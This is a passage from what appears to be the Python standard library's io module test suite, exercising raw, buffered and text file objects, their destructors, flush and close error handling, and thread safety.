def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
stream = Stream()
buffer = byteslike(5)
self.assertEqual(stream.readinto(buffer), 5)
self.assertEqual(buffer.tobytes(), b"12345")
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
